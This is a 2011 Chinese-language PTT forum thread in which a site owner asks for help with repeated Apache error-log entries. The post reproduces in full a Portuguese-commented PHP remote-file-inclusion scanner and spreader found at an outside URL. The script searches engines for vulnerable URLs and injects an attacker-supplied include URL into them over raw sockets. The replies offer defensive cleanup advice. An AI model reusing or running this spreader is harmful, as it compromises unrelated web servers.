作者september02 (九月二号)
看板PHP
标题[请益] 网路攻击?
时间Wed Jun 15 20:59:27 2011
从昨天开始,APACHE的error_log就一直出现以下讯息,一秒一次左右
[Wed Jun 15 20:47:28 2011] [error] [client 187.127.72.193] PHP Notice: Use
of undefined constant integer - assumed 'integer' in
http://www.fpe.sn/webcam/pesquisadorRFI.txt?/config.php on line 190
http://www.fpe.sn 完全不是我的网址,我也不知道这是那里
http://www.fpe.sn/webcam/pesquisadorRFI.txt的内容我看了如下
<?php
function filterPhpInjection(&$links) {
//filter the url until =
$buffer = array();
foreach($links as $key => $value) {
if(eregi("=",$value)) {
preg_match('/[^=]+/',$value,$matches);
$buffer[$key] = $matches[0] . "=";
}
}
return $buffer;
}
function getLinks(&$buffer) {
preg_match_all('/href="([^"> ]*)/',$buffer,$matches);
foreach($matches[1] as $value) {
if(eregi(".",$value) &&
!preg_match('/(google|orkut|live\.com|cade)/',$value)) {
$matches_pure[] = $value;
}
}
unset($matches);
unset($buffer);
foreach($matches_pure as $key => $value) {
if(preg_match('/^\//',$value)) {
unset($matches_pure[$key]);
}
elseif(preg_match('/^http/',$value) == 0 &&
preg_match('/^https/',$value) == 0) {
$matches_pure[$key] = '
http://' . $value;
}
}
$links = array();
foreach($matches_pure as $value) {
preg_match('/https?:\/\/[^\/]*/',$value,$first_step); # get content
in
http://..../
$second_step = preg_split('/https?:\/\/[^\/]*/',$value); # get
/.../..../..., the rest of url
$host = preg_replace('/https?:\/\//','',$first_step[0]);
$url = $second_step[1];
if(eregi("
http://|www",$host)) {
$links[$host] = $url;
}
else {
unset($host,$url);
}
}
unset($matches_pure);
return $links;
}
function getGoogle($string,$pages=1,$adicional="") {
$num = 100; # pega 100 resultados por pagina
$start = 0; # inicia do resultado 0
$buffer = "";
do {
$buffer .= @file_get_contents
("
http://www.google.com.br/search?&q=" .
urlencode("allinurl:$string$adicional") . "&num=$num&start=$start");
if($buffer == false) {
break 1;
}
if(eregi("We're sorry...",$buffer)) {
break 1;
}
if($pages > 1) {
$start += 100;
}
sleep(5);
} while(--$pages);
return $buffer;
}
function getCade($string,$pages=1,$adicional="") {
$num = 100; # pega 100 resultados por pagina
$start = 1; # inicia do resultado 0
$end = 1;
$buffer = "";
do {
$buffer .= @file_get_contents
("
http://cade.search.yahoo.com/search?&p=" .
urlencode("inurl:$string$adicional") . "&n=$num&start=$start&b=$end");
if($buffer == false) {
break 1;
}
if(eregi("erro 999",$buffer)) {
break 1;
}
if($pages > 1) {
$end += 100;
}
sleep(5);
} while(--$pages);
return $buffer;
}
function getLive($string,$pages=1,$adicional="") {
$num = 11; # pega 11 resultados por pagina, na verdade são 10
$buffer ="";
do {
$buffer .= @file_get_contents
("
http://search.live.com/results.aspx?q=" .
urlencode("$string$adicional") . "&scope=&first=$num");
if($buffer == false) {
break 1;
}
if($pages > 1) {
$num += 10;
}
} while(--$pages);
return $buffer;
}
function gerador() {
$num = rand(1,6);
$alfabeto = range('a','z');
$str = '';
while($num--) {
$n = rand(0,25);
$str .= $alfabeto[$n];
}
$sites =
array('ac','ad','ae','af','ag','ai','al','am','an','ao','aq','ar','as','at','au','aw','ax','az','ba','bb','bd','be','bf','bg','bh','bi','bj','bm','bn','bo','br','bs','bt','bv','bw','by','bz','ca','cc','cd','cf','cg','ch','ci','ck','cl','cm','cn','co','cr','cu','cv','cx','cy','cz','de','dj','dk','dm','do','dz','ec','ee','eg','eh','er','es','et','eu','fi','fj','fk','fm','fo','fr','ga','gb','gd','ge','gf','gg','gh','gi','gl','gm','gn','gp','gq','gr','gs','gt','gu','gw','gy','hk','hm','hn','hr','ht','hu','id'
,'ie','il','im','in','io','iq','ir','is','it','je','jm','jo','jp','ke','kg','kh','ki','km','kn','kp','kr','kw','ky','kz','la','lb','lc','li','lk','lr','lr','ls','lt','lu','lv','ly','ma','mc','md','me','mg','mh','mk','ml','mm','mn','mo','mp','mq','mr','ms','mt','mu','mv','mw','mx','my','mz','na','nc','ne','nf','ng','ni','nl','no','np','nr','nu','nz','nc.tr','om','pa','pe','pf','pg','ph','pk','pl','pm','pn','pr','ps','pt','pw','py','qa','re','ro','rs','ru','rw','sa','sb','sc','sd','se','sg','sh','si','sj','
sk','sl','sm','sn','so','sr','st','su','sv','sy','sz','tc','td','tf','tg','th','tj','tk','tl','tm','tn','to','tp','tr','tt','tv','tw','tz','ua','ug','uk','us','uy','uz','va','vc','ve','vg','vi','vn','vu','wf','ws','ye','yt','yu','za','zm','zw');
return '.php?' . $str . "= site:" . $sites[rand(0,250)];
//return ".php?$str=";
}
if(isset($_GET['para']) &&
isset($_GET['tempo']) &&
isset($_GET['checador']) &&
isset($_GET['enviador'])
):
ignore_user_abort(false);
set_time_limit(0);
define("NEWLINE","<br />");
define("CHECADOR",$_GET['checador'] . '?servidor=');
define("ENVIADOR",$_GET['enviador']);
$para = $_GET['para']; //para o enviador
$tempo = localtime(time(),true);
$tempo2 = $tempo['tm_min'] + $_GET['tempo'];
while($tempo['tm_min'] < $tempo2) {
$value = gerador();
if(isset($_GET['addGoogle'])) $buffer = getGoogle($value,2,' ' .
$_GET['addGoogle']);
else $buffer = getGoogle($value,2);
if(isset($_GET['addCade'])) $buffer .= getCade($value,2,' ' .
$_GET['addCade']);
else $buffer .= getCade($value);
if(isset($_GET['addLive'])) $buffer .= getLive($value,10,' '
.$_GET['addLive']);
else $buffer .= getLive($value,10);
$buffer = getLinks($buffer);
$buffer = filterPhpInjection($buffer);
foreach($buffer as $chave => $valor) {
if(eregi("
http://",$chave)) $chave = str_replace("
http://", "",
$chave);
if(!eregi("www.",$chave)) $chave = "www." . $chave;
$checa = @file_get_contents(CHECADOR . $chave);
if(eregi("verdade",$checa))
continue 1;
$url = $chave . $valor;
$inc = ENVIADOR;
$get = $valor . $inc . "?&servidor=$url¶=$para";
$header = "GET $get HTTP/1.1 \r\n";
$header .= "Host: $chave \r\n\r\n";
$sk = @socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
$conn = @socket_connect($sk, $chave, 80);
@socket_write($sk,$header,strlen($header));
if(gettype($tempo['tm_min']/20) == integer) {
mail($para,"máquina $chave pesquisando...");
}
}
$tempo = localtime(time(),true);
}
endif;
?>
请问我要怎麽阻止这个讯息一直出现T-T
求求大家帮帮忙
--
女人会爱上让她哭的男人,却嫁给让她笑的男人
男人会爱上让他笑的女人,却娶了让他哭的女人
--
※ 发信站: 批踢踢实业坊(ptt.cc)
◆ From: 218.167.187.241
1F:→ arrack:是你中毒了.. 06/15 21:02
2F:→ arrack:搜寻原始码看看有没有那个网址 06/15 21:04
3F:→ september02:我找过档案和MYSQL了,都没有发现可疑的东西... 06/16 12:43
4F:→ averywu:PHP是SERVER端的东西,应该是你的CODE里有东西了 06/16 16:33
5F:→ arrack:有时候病毒会加密,你可以从档案最後修改日期去着手查询 06/16 20:24
6F:→ arrack:我个人处理过很多次这类的情形... 06/16 20:24
7F:→ arrack:尤其是旧版的opensource套装软体,如osc... 06/16 20:25